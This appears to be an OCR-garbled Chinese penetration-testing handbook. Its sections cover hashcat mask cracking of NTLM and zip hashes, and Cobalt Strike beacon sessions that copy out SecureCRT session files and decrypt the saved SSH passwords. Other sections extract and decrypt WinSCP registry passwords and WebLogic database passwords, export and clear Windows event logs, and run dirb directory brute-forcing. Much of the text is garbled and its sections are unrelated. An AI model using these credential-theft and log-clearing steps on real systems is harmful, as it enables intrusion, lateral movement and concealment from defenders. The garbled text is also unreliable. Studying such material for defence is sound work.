2u?1?1?1?1?d?d?d # 首位 大 写字 母后 四 位 小 写字 母 最 后 三 位 数字 


?1?1?1?1?1?s2019 # 前 五 位 小 写字 母 + 一 位 特殊 字符 +2019 例如 : admin@2019 





--increment --increment-min 5 --increment-max 8 ?a?a?a?a?a?a?a?a # 5-8 位 所 有 字 


> 


自 定义 掩 码 规 则 

| 编号 | 用 户 自 定义 | 定义 | 

I 

|-1, --custom-charset1 | User-defined charset ?1 | -1 ?I?d?u| 
|-2, --custom-charset2 | User-defined charset ?2 | -2 ?l?d?s| 
|-3, --custom-charset3 | User-defined charset ?3 | | 

|-4, --custom-charset4 | User-defined charset ?4 | | 

使 用 ?1、?2、?3、?4 来 表示 


示例 : 
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4 4234567890abcd ! 04/5 ?1?1?1?1 # 定义 掩 码 规则 1 包含 数字 和 一 些 字母 和 特殊 字符 ，4 位 定义 字符 


_-custom-charset2 abcdABCD1234 admin?2?2?2?2 # GEMBROARNU2, admin-AfUuxE X ES 


特殊 字符 组 合 
而 缚 旨 要 目标 是 一 些小 语种 地 区 的 机 器 ， 密码 可 能 包含 有 例如 : 俄语 、 法 语 、 意 大 利 语 等 等 ， 可 以 
站 定义 撞 码 规则 ,利用 hashcat 自 带 的 charsets/special 文件 夹 下 的 字符 包 进 行 定制 


21 charsets/special/Spanish/es ISO-8859-1-special.hcchr 


站 可 以 自 定义 hcchr 字 符 集 包 ， 再 使 用 转 码 工具 类 似 于 iconv 进行 编码 调用 。 


掩 码 破解 
小 试 牛刀 


./hashcat -a 3 -m 1000 --force 32ed87bdbSfdc5e9cba88547376818d4 ?d?d?d?d?d?d -0 
b 

定义 6 位 纯 数字 ， 依 靠 机 器 性 能 暴力 破解 ， 仅 需 秒 位 数 就 可 破解 。 
将 结果 输出 到 -o res.txt 文件 ， 格式 为 --outfile-format 3 --» hash: 密 码 

。 输出 格式 介绍 : 
| 编号 | 形式 | 
HH 
|1 | hash[:salt]| 
|2 | plain| 
[8 | hash[:salt]:plain| 
|4 | hex. plain] 
[5 | hash[:salt|:hex plain| 
J6 | plain:hex plain] 
|7 | hash[:salt]:plain:hex_plain| 
|8 | crackpos| 
[9 | hashf[:salt]:crackpos| 
|10 | plain:crackpos| 
|11 | hash[:salt]:plain:crackpos| 
|12 | hex plain:crackpos| 
|13 | hash[:salt]:hex plain:crackpos| 


|14 | plain:hex plain:crackpos| 


|15 | hash[:salt]:plain:hex_plain:crackpos| 
复杂 密码 掩 码 破解 
新 建 用 户 密码 NTLM-Hash 如 下 


RID : 000003e9 (1001) 


ser : admin 
Hash NTLM: 2d757e49011b63e858129e274974d3a7 
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' /hashcat -à 3 -m 1000 --force 2d757e49011b63e858129e274974d3a7 --custom-charset 


ONE d 
自 定 义 掩 码 规则 ， 限制 密码 位 数 为 6-8， 使 用 显卡 进行 暴力 破解 (BRIA) 








Length:6 
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+ hashcat 


4. Undefined 


Started: Wed 
Stopp 


在 这 个 菜 鸡 的 显卡 性 能 下 仅仅 只 需要 30 秒 就 可 以 将 密码 跑 出 来 ， 自 定义 掩 码 的 效率 非常 高 。 


hcmask 批量 掩 码 文件 
如 果 想 要 定义 多 个 掩 码 ， 可 以 选择 保存 在 .hcmask 文 件 中 ， 书 写 规则 如 下 : 





[?1, ][?2, ][23, ] [?4, ]mask # ”其 中 前 面 的 自 定义 字符 集 是 可 选 的 


?1?d?d?d?d 


?2a?a?a?a?d?d 


?u?u?u?u?u?a?a?d?d 
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cd, 12345?1?1,1234567890ABCabc, 717123727174 


SBE -1,-2,-3,-4 ， 最 后 一 个 表示 掩 码 


调用 hcmask 即 可 


t -a 3 -m © test.hash test.hcmask 


对 名 类 破解 方式 进行 组 合 的 破解 方法 ， 高 度 自 定义 为 的 就 是 效率 
典 + 掩 码 破解 Wordpress-Hash 


ee 
E 


Shcat -a 6 -m 400 $P$9844784761agS59wHZvyQMArzfx58u. john.txt ?d?d?d 


ohn.txt 获取 密码 + 掉 码 规则 ， 最 后 组 合 的 密码 就 是 


字典 组 合 winzip-Hash 





码 的 Hash 需 要 用 到 工具 johnThel tippe 


john target.zip > hash 

at hash 

p2$*0*1+0*9728599510190140*b013*0**37448f09fa06cb899efa*$/zip2$ 
MheRipper 还 可 以 获得 到 很 多 其 他 类 型 加 密 压缩 包 的 密码 hash (包括 rar、7z、office 等 


有 兴趣 的 兄弟 可 以 研究 一 下 。 


KX 给 Hashcat 
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Meses 


» E v Í 


./hashcat -a 1 -m 13600 $2ip2$*0*1*0*9728599510190140*b013*0**37448f09fa06cb899 


字典 集合 分 享 


https://crackstation.net/cr 





https:/Aveakpass.com/download 
http://ophcrack.sourceforge.net/tables php 
https://github.com/fuzzdb-project/fuzzdb 


https://wiki.skullsecurity,org/Passwords#Password_ dictionaries 


1-wordlist-password-cracking-dictionar 


y.htm 


战略 支援 部 近期 会 对 网 络 上 的 字典 进行 下 载 整理 汇总 ， 形 成 较 完 整 的 字典 表 。 


其 他 暴力 破解 软件 


Aircrack-ng--WIEI 破 解 








John The Ripper-- 功 





Medusa--1i 





Ophcrack--LM-Hash4g 8 





THC Hydra--% 





WEFUZZ--WebFuzz 


在 线 解 Hash 网 站 


https://www.cmd5.com/ 
https://crackstation.net/ 
https:/Awww.onlinehashcrack.com/ 

https:/Awww.objectif-securite.ch/ophcrack.php 


.com/ 
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TERME 
cureCRT 客 户 端 中 保存 的 密码 hash 


时 运 维 人 员 常用 的 管理 工具 。 但 由 于 某 些 运 维 人 员 的 安全 意识 不 高 ， 平 时 很 可 能 会 把 
密码 都 保存 在 里 面 ， 这 就 给 了 渗透 人 员 可 乘 之 机 ， 为 后 续 跨 平 台 横 向 移动 做 了 准备 。 而 
昌 是 为 了 解密 保存 在 SecureCRT 中 的 这 些 SHH 连 接 密 码 ， 并 通过 这 种 方式 实现 Windows 
的 快速 横向 渗透 。 

下 进行 ， 解 密 脚 本 仅 限 于 SecureCRT 7.x 以 下 版 本 ， 高 版 本 需要 使 用 文章 末 的 方法 。 
ECRT 有 启动 密码 ，Config 加 密 了 ， 就 不 要 搞 了 。 


TN 
| 2 VANDYKE'  SecureCRT^ 


SOFTWARE 


| @ En 
OK | ter passphrase 
k sosoo 
Cancel |. 











assword | 


4 128 requires a password, 
ord now. 






Continue without entering a passphrase 
(Saved passwords and other sensitive data will not be used and will 
not be able to be saved.) 


Change Passphrase... OK Cancel 


引 标 SecureCRT 的 详细 版 本 
定 SecureCRT 的 详细 版 本 ， 通 过 powershell 财 本 搞定 ， 或 者 直接 RDP 登 录 连 接 查询 等 1 绿 
RRR 。 发 现 目标 所 用 的 详细 版 本 为 7.1.1 (build 264) 。 


n: powershell-import /Users/anonysec/ListInstalledPrograms.psi 
0n» powershell Get-list 
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beacon> powershell-import /Users/anonysec/ListInstalledPrograms.ps1 
[*] Tasked beacon to import: /Users/anonysec/ListInstalledPrograms psi 
[+] host called home, sent: 864 bytes 
beacon> powershell Get-list 
[x] Tasked beacon to run: Get-list 
[*] host called home, sent: 293 bytes 
[+] received output: 
[x] OS: x64 
[*] List the 64 bit programs that have been installed 
Microsoft Visual C++ 2019 X64 Additional Runtime - 14.20.27508 
k | 


VMware Tools 

Microsoft Visual C++ 2019 X64 Minimum Runtime - 14.20.27508 

[*] List the 32 bit programs that have been installed 

Microsoft Visual C++ 2015-2019 Redistributable (x64) - 14.20.27508 
Microsoft Visual C++ 2015-2019 Redistributable (x86) - 14.20.27508 
Microsoft Visual C++ 2019 X86 Minimum Runtime - 14.20.27508 
Microsoft Visual C++ 2019 X86 Additional Runtime - 14.20.27508 


About SecureCRT 










A @ VANDYKE” SecureCRT° 


SOFTWARE 


Official Release - May 30, 2013 
1013 VanDyke Seftware, Inc. 





RIO 


UL ight © 





http://www.vandyke.com Contact Support 


Contains encryption software from RSA Security Inc. 
Copyright © 1998-2003 RSA Security Inc. All Rights 
Reserved, 





Portions Copyright (C) 1998 CORE SDI S.A., Buenos 
Aires, Argentina. All Rights Reserved. 
http://www.core-sdi.com 


This product is licensed to: 


PortableSoft 

PortableSoft 

Serial Number: 03-45-378294 

Issue Date: 06-05-2013 

Access to support and updates expires: 06-06-2014 
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Buc 
| ;ureCRT 配 置 文件 El 录 下 的 Sessions 目 录 


，SecureCRT 的 Config 目 录 路 径 为 : %APPDATA%\VanDyke\Config\Sessions\ 


定 路 径 ， 可 以 通过 图 形 界面 在 SecureCRT 菜 单 的 全 局 选项 中 来 确认 。 


d 


ault Session 


| [^ Show connection closed dialog 

| lv Show confirm disconnect dialog 

IV Show connect dialog on startup 

|. [V Save expanded folder state in connect dialog 
| “a New session uses s wizard. 


| V. Show toolbar [^ Show menu bar 
a Show status bar [V Show connect bar | 


| Connect dialog sort order: Alphabetically v | 


| [ Minimize to Activator in the system tray 





^ 


| Recently used session list: ,4 = 






Con Tguration folder 


c \Users\Administrator\AppData\Roaming\VanDyke\Config E 








cmi | 
SER TI nte DOES Ps 名 。 


n>shell dir %APPDATA%\VanDyke\Config\Sessions\ 
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beacon> shell dir %APPDATA%\VanDyke\Config\Sessions\ 

[*] Tasked beacon to run: dir %APPDATA%\VanDyke\Config\Sessions\ 
[+] host called home, sent: 69 bytes 

[+] received output: 

驱动 器 C 中 的 卷 没 有 标签 。 

卷 的 序列 号 是 F4C6-8866 


C:\Users\r@0t\AppData\Roaming\VanDyke\Config\Sessions 的 目录 


2019/10/08 09:32 «DIR» 
2019/10/08 09:32 <DIR> SEES Ae a 
2019/10/08 09:32 10, 096/192.168.144.128.ini} 
2019/10/08 09:30 10,077 oY: TT BT 
2019/10/08 09:32 90 _ FolderData .ini 
3 个 文件 20,263 字 节 
2 个 目录 106,834,051,072 可 用 字 节 





拷贝 下 载 Sessions 目 录 的 ini 文 件 


直接 到 Sessions 目 录 下 载 ini 文 件 可 能 会 有 问题 (应 该 程序 占用 ) ， 即 使 下 载 下 来 ， 到 本 地 可 能 无 法 
解密 。 所 以 ， 先 用 Invoke-NinjaCopy.ps1 脚 本 把 ini 文 件 先 copy 到 其 他 目录 ， 然 后 再 去 下 载 。 


beacon» powershell-import /Users/anonysec/Invoke-NinjaCopy.psi 
beacon» powershell Invoke-NinjaCopy -Path "C:NUsersNrGOtNAppDataNRoamingNVanDyke 


beacon» shell dir c:\windows\temp\192.168.144.128.ini 
beacon» download c:\windows\temp\192.168.144.128.ini 


beacon» powershell-import /Users/anonysec/Invoke-NinjaCopy.psl 

[+]: Tasked beacon to import: /Users/anonysec/Invoke-NinjaCopy.psl 

[+] host called home, sent: 206732 bytes 

beacon» powershell Invoke-NinjaCopy -Path “C:\Users\r00t\AppData\Roaming\VanDyke\Config\Sessions\192.168.144.128.ini" -LocalDestination “c:\windows\temp\192.168. 144. 128. ini" 
[*] Tasked beacon to run: Invoke-NinjaCopy -Path “C:\Users\réét\AppData\Roaming\VanDyke\Config\Sessions\192.168.144.128. ini“ -LocalDestination "c: Windows temp 192.168 .144.128. 
ini" 

[*] host called home, sent: 681 bytes 

beacon» shell dir c:\windows\temp\192.168.144,128.ini 

{+} Tasked beacon to run: dir c: WwindowsVtemp 192. 168.144.128.ini 

[*] host called home, sent: 70 bytes 

[*] received output 

LIU AS LLLI 

卷 的 序列 号 是 FACO-8866 


c:\windows\temp 的 目录 

2019/10/08 09:46 10,096 192.168.144.128. ini 
1 个 文件 10,096 字 节 
© 个 目录 106,823,028,736 可 用 字 节 


beacon» download c:\windows\temp\192.168.144.128.ini 
[+] Tasked beacon to download c:Xwindows temp X192.168.144.128. ini 


[+} host called home, sent: 43 bytes 
[*] started download of c:\windows\temp\192.168.144.128.ini (10096 bytes) 
[r] download of 192.168.144,128.iní is complete 





脚本 解密 Session 


将 下 载 的 ini 文 件 拷贝 到 本 地 ， 利 用 脚本 进行 解密 。 环境 : python 2.7、pycrypto 库 。 此 处 解密 脚本 
仅 限 于 SecureCRT 7.x 以 下 的 版 本 ! 


sudo pip2 install pycrypto 
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cBook-Prox BB Dp 
128.ini 
root@192.168.144.128 £ windows 





| SecureCRT-decryptpass.py 192.168.144.128.ini 







"n SecureCRT-decryptpass.py 







o SecureCRT-decryptpass.py 192.168.144.128.ini 


root@192.168.144.128 # windows 


ureCRT 高 版 本 解决 


标的 SecureCRT 版 本 较 高 ， 无 法 进行 解密 该 怎么 办 ? 此 处 以 8.5.3 (X64 build 1867) 为 例 ， 
可 对 应 config %APPDATA%\VanDyke\Config\ 整个 目录 拷贝 到 本 机 SecureCRT 的 config 目 录 
然后 直接 连接 。 

secureCRT 版 本 与 本 地 版 本 需 一 致 ， 否 则 可 能 会 出 现 问题 .…。 


Securels 








x 


E uoo: | 许可 证 | 历史 


> VANDYKE SecureCRT^ 


SOFTWARE 









5.3 (x64 build 1867)| - Official Release - 2019 年 2 月 12 日 

© 1995-2019 VanDyke Software, Inc. 

TO E www.nocamd.com 
is licensed to: 

User 


Number: 03-85-000000 
Date: 10-09-2019 


确定 
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er ted 
Sone © RES 


gu > 








OR roortAnonySec 





ZRP Gr 2 Amo 


EF 
UO rootRAnonySec: " x| 


= 
pKa 
irootilAnonySec g 


$ 
j 


附 脚本 


e ListinstalledPrograms.psi 
e Invoke-NinjaCopy.ps1 


。 SecureCRT-decryptpass. py 





weiss XR: 


Coa Oat ? 9$ 















gow 





Wm i t 


1108 
















inscp 客 户 端 中 保存 的 密码 hash 


秘 虹 一个 Windows 环 境 下 使 用 的 SSH 的 开源 图 形 化 SFTP 客 户 端 。 同 时 支持 SCP 协 议 。 它 的 主 
各 未 地 与 远程 计算 机 间 安 全 地 复制 文件 ， 并 且 可 以 直接 编辑 文件 。 而 我 们 的 主要 目的 是 为 
荐 里 面 各 种 的 SHH 连 接 密码 。 


人 全 部 在 管理 员 权限 下 进行 
新 版 Winscp 为 例 
泛 过 powershell 肝 本 搞定 ， 或 者 RDP 直 接 登 录 连 接 查 询 等 。 【绿色 版 无 安装 记录 | 


n» powershell-import /Users/anonysec/ListInstalledPrograms.psi 
peacon> powershell Get-list 





n> powershell-import /Users/anonysec/ListInstalledPrograms.ps1 
[asked beacon to import: /Users/anonysec/ListInstalledPrograms.ps1 
host called home, sent: 864 bytes 

on> powershell Get-list 

[asked beacon to run: Get-list 

host called home, sent: 293 bytes 

received output: 

OS: x64 

List the 64 bit programs that have been installed 


nSCP 5. 15.4 


aWin>CP 





为 建 版 本 0840) 







© 2000-2019 Martin Prikryl 
https://winscp.net/ 
EE Lev 


^ 


kc 
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nis | a 3 is 
La 
Ga 新 会 话 
文件 协议 (P) 
dio 一 . SFTP v 
将 会 话 保存 为 站 点 主机 名 (H) BOE) 
2 ERS), 192.168.144.128 22:4 
roat@ 192.168.144.128 Togo i 
RPA) WEP) 
Xx (E root eoseeee 
<none> ~ 
[ 保存 (S$)..。 [v EA). vw 
TEE Ani 帮助 (H) | 
Eur WEM Y aez iv 关闭 帮助 


确定 Winscp 存 储 位 置 


默认 情况 下 ，Winscp 配 置 会 存储 在 Windows 对 应 的 注册 表 项 下 (包括 了 连接 的 IP、 用 户 名 、 密 码 
Hash) 。 


HKEY CURRENT USERNSoftwareNMartin Prikryl\WinSCP 2\Sessions\ 


具体 解密 过 程 


。 查看 Winscp 配 置 的 Windows 注 册 表 (注册 表 项 是 固定 的 ) ， 如 果 有 连接 会 话 ， 再 指定 查询 连接 
下 所 保存 的 密码 Hash。 





beacon> shell reg query "HKEY CURRENT USERNSoftwareNMartin Prikryl\WinSCP 2\Sess 
beacon> shell reg query "HKEY CURRENT USERNSoftwareNMMartin PrikrylNWinSCP 2\Sess 


beacon> shell reg query “HKEY. CURRENT USER VSoftwareMartin PrikrylNWinSCP 2\Sessions" 

[*] Tasked beacon to run: reg query “HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Sessions” 
[+] host called home, sent: 102 bytes 

[*] received output: 


KEY CURRENT USER VSoftwareMartin PrikryUWinSCP 2\Sessions\Default%20Settings 
IHKEY CURRENT. USERNXSoftwareMartin PrikryL\WinSCP 2\Sessions\root@192.168.144.128 


lbeacon> shell reg query “HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Sessions\root@192.168.144.128 " 

+] Tasked beacon to run; reg query "HKEY CURRENT USERXSoftwareMMartin PrikrylNWinSCP 2\Sessions\root@192.168.144.128 " 
[*] host called home, sent: 124 bytes 

[+] received output: 


IHKEY CURRENT, USER\Software ro0t0192.168.144.128. 
HostName REG_SZ 
UserName REG SZ | root 
Password REG SZ | A35C4655D80F6B164EC124631D2E3333286D656E726D6A6472606868726D6E6428353238332B2F564EEBOOBOAC7BB86F 526: 





[n7 


将 查 到 的 信息 拷贝 到 本 地 的 winscppwd.exe 进 行 解密 。 
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ywd.exe root 192.168.144.128 n35C4655D8DF6B165EC124631D2bE3333286D656E Y 
; 368126D6E642B353238332B2F 5G UEEBOOBORC 7B886F 5268 
168.145.128 windows 


é pF 


是 接 登录 目标 ， 导 出 Winscp 配 置 文件 ， 并 下 载 到 本 地 进行 解密 。 (如 果 找到 配置 的 in 文 
Pe, AREWA F downzs83 TA SBN RT) 


2 


= 


018192. 168.144.128 
913192158. 14.179 











- SMi: C:\Windows\systemae vem 
s\Administrator\Desktop>winscppwd.exe WinSCP. ini 
WinSCP.ini 
.168.144.128 windows 

192.168.144.129 admin@123 


sers\Administrator\Desktop> 





® ListInstalledt 
dl Winscppwd.e» 


* 
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破解 Weblogic 配 置 文件 中 的 数据 库 密 码 


Weblogic 


Weblogic 默 认 端 口 是 7001，Weblogic10g-12c 默 认 的 管理 后 台 是 : hup/localhost 7001/console 
Weblogic 控 制 台 : Weblogic10 以 下 默认 管理 帐号 :weblogic 密码 : weblogic 


在 一 次 实战 中 遇 到 的 weblogic 服 务 中 Oracle 数 据 库 的 密码 是 加 密 的 hash 
下 面 说 明 破 解 的 步骤 和 原理 


获取 四 个 文件 


- SerializedSystemIni,dat( 路 径 : /Weblogic/user projects/domains/base domain/secur 
- boot ,properties( 路 径 : Weblogic/user projects/domains/base domain/servers/Admins 
- grcspDS-6212-jdbc.xml( 路 径 : /Weblogic/user projects/domains/base domain/config/ 
- config.xml( 路 径 : Weblogic/user projects/domains/base domain/config/) 


使 用 工具 WebLogicPWV1.0.jar 破解 




























| 
| 











| 
| 
| 





4) Weblogic AES/3DESE XET LE By:QQ95346307 


C: \Users QR DesktopiSerializedSystenIni. dat 





从 config.xml 配 置 文件 中 获取 hash 
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LCIpLrBSaTA 





AES/3DES& X R2 € LE By:QQ95346307 








Misers IDesktophSerializedSyztemIni, dat 选择 | 
j AES)CLSSSD«Y j Mul buXPvHVAQclxelE- | 
| sblogic125 解密 | 
S:6212-jdbc.xml 中 获取 hash 得 到 密码 
iser. projecte/domains/base. domain/config/ kibc/grespDS 6217 jdbc xmi -° 


DRF BER- OMERI . 


“下 为 什么 去 两 次 密码 ， 有 什么 区 别 一 些 文章 博客 中 介绍 ， 只 需要 取出 config.xml 文 件 中 
J 破解 就 可 以 ， 实 际 情况 是 ， 我 破解 出 密 钥 之 后 怎么 也 尝试 登陆 也 不 对 ， 可 能 还 有 一 点 理 
E : 后 续 我 去 寻找 了 数据 库 的 配置 文件 ， 既 grcspDS-6212-jdbc.xml， 把 他 的 hash 破 解 了 
着 库 就 是 正确 的 。 这 样 就 很 好 理解 (个 人 理解 ) ，SerializedSystemlni.dat 中 存储 的 
个 密码 ， 破 解 weblogic 中 的 hash 就 需要 这 一 串 密 码 进行 解密 。 
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# Weblogic 12c: n » 

Weblogici2Nuser projects NdomainsNbase domainNsecurityNSerializedSystemIni.dat 
# Weblogic 9: 
weblogic_9\weblogic92\samples\domains\wl_server\security\SerializedSystemIni.g 
# Weblogic 如 果 有 配置 数据 源 ， 那 么 默认 数据 源 配置 文件 应 该 在 : 
weblogici2\user_projects\domains\base_domain\config\config.xml 





1114 










rce Ki 工具 包 中 的 查看 本 地 和 远程 日 志 的 工具 


取 最 后 days 天 的 日 志 ，days 为 正 整数 
取出 事件 ID nn WAR (nn 最 多 指定 1 
输出 日 志 的 位 置 和 文件 名 
转 储 指定 日 志 类 型 (可 选 的 为 System, security, application, 可 能 还 有 别 | 
转 储备 份 文 件 
取出 指定 记录 名 字 的 事件 

取出 指定 记录 名 字 以 外 的 时 间 
指定 包含 要 转 储 事件 日 志 的 服务 器 。 
使 用 制 表 符 分 割 字符 串 (默认 是 空格 ) 


i e [-s \\server] [-1 log [-m source]] [-e ni n2 n3..] [-r] [-t] [-d 


;个 ， 用 空格 隔 开 ) 


ERIS DFE 
不 输出 字符 串 
输出 指定 格式 . 默认 格式 为 : dtTCISucs 
where 
t s 
d - date 
T - event type 
C - event category 
I - event ID 
S - event source 
u - user 
C - computer 
S - strings 


sexe -f c:\windwos\temp\log -s \\dc-ip -1 security -d 3 


最 近 :天 内 的 安全 日 志 


util 


理 员 权限 ， 否 则 无 法 导出 
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Windows server 2008 及 以 上 版 本 自 带 的 事件 命令 程序 ， 用 于 检索 有 关 事件 日 志和 发 布 者 的 信 
安 ] ` 5 d A TUA 发布 者 的 Ei 
安装 和 印 载 事件 清单 ， 运 行 查询 以 及 导出 、 存 档 和 清除 B 志 。 ， 信息 ， 


用 法 : 
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用 大 写 形式 。 


gis (n ep /uni) 或 长 (如 
ishers /unicode ) 形 式 的 命令 和 选项 名 称 。 
选项 值 不 区 分 大 小 写 。 


|] COMMAND [ARGUMENT [ARGUMENT] 


logs 列 出 日 志 名 称 。 
获取 日 志 配 置信 息 。 
修改 日 志 配置 。 
m-publishers 列 出 事件 发 布 者 。 
jet -publisher 获取 发 布 者 配置 信息 。 
nstall-manifest ”从 清单 中 安装 事件 发 布 者 和 日 志 。 
nstall-manifest 从 清单 中 卸载 事件 发 布 者 和 日 志 。 






...] [/OPTION: VALUE [/OPTION:VALUE] ... 











ry-events 从 日 志 或 日 志文 件 中 查询 事件 。 
1og-info 获取 日 志 状态 信息 。 
导出 日 志 。 
| 存档 导出 的 日 志 。 
clear-log 清除 日 志 。 


remote}: VALUE 
定 ， 则 在 远程 计算 机 上 运行 该 命令 。VALUE 是 远程 计算 机 名 称 。 
] /um 选项 不 支持 远程 操作 。 


| username) : VALUE 

个 不 同 的 用 户 以 登录 到 远程 计算 机 。 

是 domain\user 或 user 形式 的 用 户 名 。 只 有 在 指定 /r 选项 时 才 适 用 。 
Password} : VALUE 

用 户 密码 。 如 果 未 指定 ， 

ALUE 为 "*"， 则 会 提示 用 户 输入 密码 。 

/u 选项 时 才 适 用 。 


| authentication}:[Default |Negotiate|Kerberos|NTLM] 
E 


E 接 到 远程 计算 机 的 身份 验证 类 型 。 默 认 值 为 Negotiate。 


i | unicode}: [true|false] 
Unicode 显示 输出 。 如 果 为 true， 则 使 用 Unicode 显示 输出 。 
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wevtutil epl Security c: Mlog.evxt 3 Po 


psloglist 


psloglist 是 PSTOOLS 工 具 集 中 的 一 个 查看 系统 事件 记录 的 程序 。 





psloglist [NANNX 远 程 机 器 ip [-u username [-p password]]] [-s [-t delimiter]] [-n & 
\#)[-c][-x][-r]L-a mm/dd/yy][-b mm/dd/yy][-f filter] [-1 event log file] «event]. 
它 的 参数 有 : 

-u 后 面 跟 用 户 名 -p 后 面 是 跟 密码 的 , 如 果 建 立 ipc 连 接 后 这 两 个 参数 则 不 需要 。 
-C! 显 示 事 件 之 后 清理 事件 记录 

-1 < 事件 记录 文件 名 > ;用 于 查看 事件 记录 文件 

-n <n>: 只 显示 最 近 的 n 条 系统 事件 记录 。 

-d <n>: 只 显示 n 天 以 前 的 系统 事件 记录 

-a mm/dd/yy :显示 mm/dd/yy 以 后 的 系统 事件 记录 

-b mm/dd/yy :显示 mm/dd/yy 以 前 的 系统 事件 记录 

-f < 事件 类 型 >; 只 显示 指定 的 事件 类 型 的 系统 事件 记录 。 

-X: 显示 事件 数据 代码 

-r: 从 旧 到 新 排列 〈 如 不 加 则 默认 是 从 新 到 旧 排 列 ) 

-S :以 一 个 事件 为 一 行 的 格式 显示 ， 中 间 默 认 以 逗号 格 开 各 个 信息 。 

-t < 字符 > : 这 个 参数 和 - s 连 用 ， 以 来 改变 - s 中 默认 的 逗号 。 


查看 远程 服务 器 事件 : 


psloglist \\remote-ip idnn 


查看 远程 服务 器 事件 类 型 为 Error 的 最 后 10 条 : 


psloglist \\remote-ip -n 10 -f error 
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发 现 目标 WEB 程 序 敏感 目录 第 一 季 


DIRB 官 方 地 址 : http://dirb S 'urceforge.net 


简介 (摘自 官方 原文 ) : 


DIRB is a Web Content Scanner. It looks for existing (and/or hidden) Web Objects. It basically 
works by launching a dictionary based attack against a web server and analizing the response. 


1128: 

DIRB 是 一 个 基于 命令 行 的 工具 ， 依 据 字典 来 爆破 目标 Web 路 径 以 及 敏感 文件 ， 它 支持 自 定义 UA， 
cookie， 忽 略 指定 响应 吗 ， 支 持 代 理 扫描 ， 自 定义 毫秒 延迟 ， 证 书 加 载 扫描 等 。 是 一 款 非常 优秀 的 
全 方位 的 目录 扫描 工具 。 同 样 Kaili 内 置 了 dirb。 

攻击 机 : 192.168.1.104 Debian 


ÉREl: 192.168.1.102 Windows 2003 IIS 


| (D fj. 192.168. 1. 102 anaes /Login, aspi Re torni 





PF ID 3 Za v6.3 


C 经典 风格 P 传统 风格 


Ex 三 记 住 本 次 登录 


w PRPC RASA Sd FS) - GEF 024* T66L I ERE RO 


普通 爆破 : 
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Tops" 


MODO: —/word1ist/smalls dirb http://192.168.1.102 ./ASPX.txt 
T 


DIRB v2.22 


START. TIME: Sun Feb 17 23:26:52 2019 
URL. BASE: http://192.168.1.102/ 
WORDLIST FILES: ./ASPX.txt 


1 GENERATED WORDS: 822 


Scanning URL: http://192.168.1.102/ ---- 
f http://192.168.1.102//Index.aspx (CODE:200|SIZE:2749) 
f http://192.168.1.102//Manage/Default.aspx (CODE:302|SIZE:203) 


END-TIME: Sun Feb 17 23:26:56 2019 
DOWNLOADED: 822 - FOUND: 2 


«E 


i:~/wordlist/small# dirb http: //192,168.1,.102 . /ASPX. txt 


: Sun Feb 17 
: http 


ATED WORDS: 822 


Scanning URL: http://192.168.1.102/ ---- 
‘192,168.1.102//Index.aspx (CODE: 200|SIZE:2749) 


: Sun Feb 17 23:26:56 2019 
DED: 822 - FOUND: 2 
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root@John:~/wordlist/small# dirb http://192.168.1.102 ./ASPX.txt, ./DIR. txt 


DIRB v2.22 
By The Dark Raver 


START_TIME: Sun Feb 17 23:31:02 2019 
URL_BASE: http://192.168.1.102/ 
WORDLIST_FILES: ./ASPX.txt, ./DIR.txt 


GENERATED WORDS: 1975 


---- Scanning URL: http://192.168.1.102/ ---- 
http://192.168.1.102//Index.aspx (CODE:200|SIZE:2749) 
http://192.168.1.102//Manage/Default.aspx (CODE:302|SIZE:203) 
http://192.168.1.102//bbs (CODE:301|SIZE:148) 
http://192.168.1.102//manage (CODE:301|SIZE:151) 
http://192.168.1.102//manage/ (CODE:302|SIZE:203) 
http://192.168.1.102//kindeditor/ (CODE:403|SIZE:218) 
http://192.168.1.102//robots.txt (CODE:200|SIZE:214) 
http://192.168.1.102//Web.config (CODE:302|SIZE:130) 
http://192.168.1.102//files (CODE:301|SIZE:150) 
http://192.168.1.102//install (CODE:301|SIZE:152) 


+ + + + t+ t+ t+ t+ t+ oc 
PRPRPPBRHPEP EBB PB 


(!) FATAL: Too many errors connecting to host 
(Possible cause: EMPTY REPLY FROM SERVER) 


END_TIME: Sun Feb 17 23:31:06 2019 
DOWNLOADED: 1495 - FOUND: 10 
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-FASPX, txt, . /DIR, txt 


IST FILES: Cs .FDIR.txt 


RATED WORDS: 1975 


Scanning URL: ht 


:301| SIZE:148) 
CODE: 301| SIZE:151) 
302|SIZE:203) 
E:403| SIZE:218) 
3. tx C :200| SIZE:214) 
ifig (COD 2|SI2E:130) 
ffiles {(CODE:3 SIZE:150) 
‘finstall (CODE:: 


: Too many errors connecting 
sible cause: EMPTY REPLY FROM S 


D TIME: Sun Feb 17 23:31:06 2019 
WINLOADED: 1495 - FOUND: 10 


自 定义 UA: 
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DIRB v2.22 
By The Dark Raver 


START TIME: Sun Feb 17 23:34:51 2019 
URL BASE: http://192.168.1.102/ 
WORDLIST FILES: ./ASPX.txt 

USER AGENT: Mozilla/5.0 (compatible; Googlebot/2.1; «http://www.google.com/bot.p 





GENERATED WORDS: 822 


---- Scanning URL: http://192.168.1.102/ ---- 
+ http://192.168.1.102//Index.aspx (CODE:200|SIZE:2735) 
+ http://192.168.1.102//Manage/Default.aspx (CODE:302|SIZE:203) 


END TIME: Sun Feb 17 23:34:54 2019 
DOWNLOADED: 822 - FOUND: 2 


xt -a "Mozilla/S.G (compatible; Googlebot/2.1; http://www. google. com/bot html)” 


)gle.com/bot.html) 





EIXE cookie: 
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TIME: Sun Feb 17 23:53:08 2019 

» http://192.168.1.102/Manage/ 

T FILES: ./DIR.txt 

GENT: Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.t 
E: ASP.NET. SessionId-jennqviqmc2vws5504ggwu45 


Meee ee eee ee we 


anning URL: http://192.168.1.102/Manage/ ---- 
//192.168.1.102/Manage//include/ (CODE:403|SIZE:218) 
//192.168.1.102/Manage//news/ (CODE:403|SIZE:218) 
//192.168.1.102/Manage//include (CODE:301|SIZE:159) 
//192.168.1.102/Manage//images/ (CODE:403|SIZE:218) 
:p://192.168.1.102/Manage//sys/ (CODE:403|SIZE:218) 

ti //192.168.1.102/Manage//images (CODE:301|SIZE:158) 


FATAL: Too many errors connecting to host 
(Possible cause: EMPTY REPLY FROM SERVER) 


"AA 


TIME: Sun Feb 17 23:53:10 2019 
NLOADED: 673 - FOUND: 6 
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DIRB v2.22 
By The Dark Raver 


START TIME: Sun Feb 17 23:54:29 2019 

URL BASE: http://192.168.1.102/Manage/ 

WORDLIST FILES: ./DIR.txt 

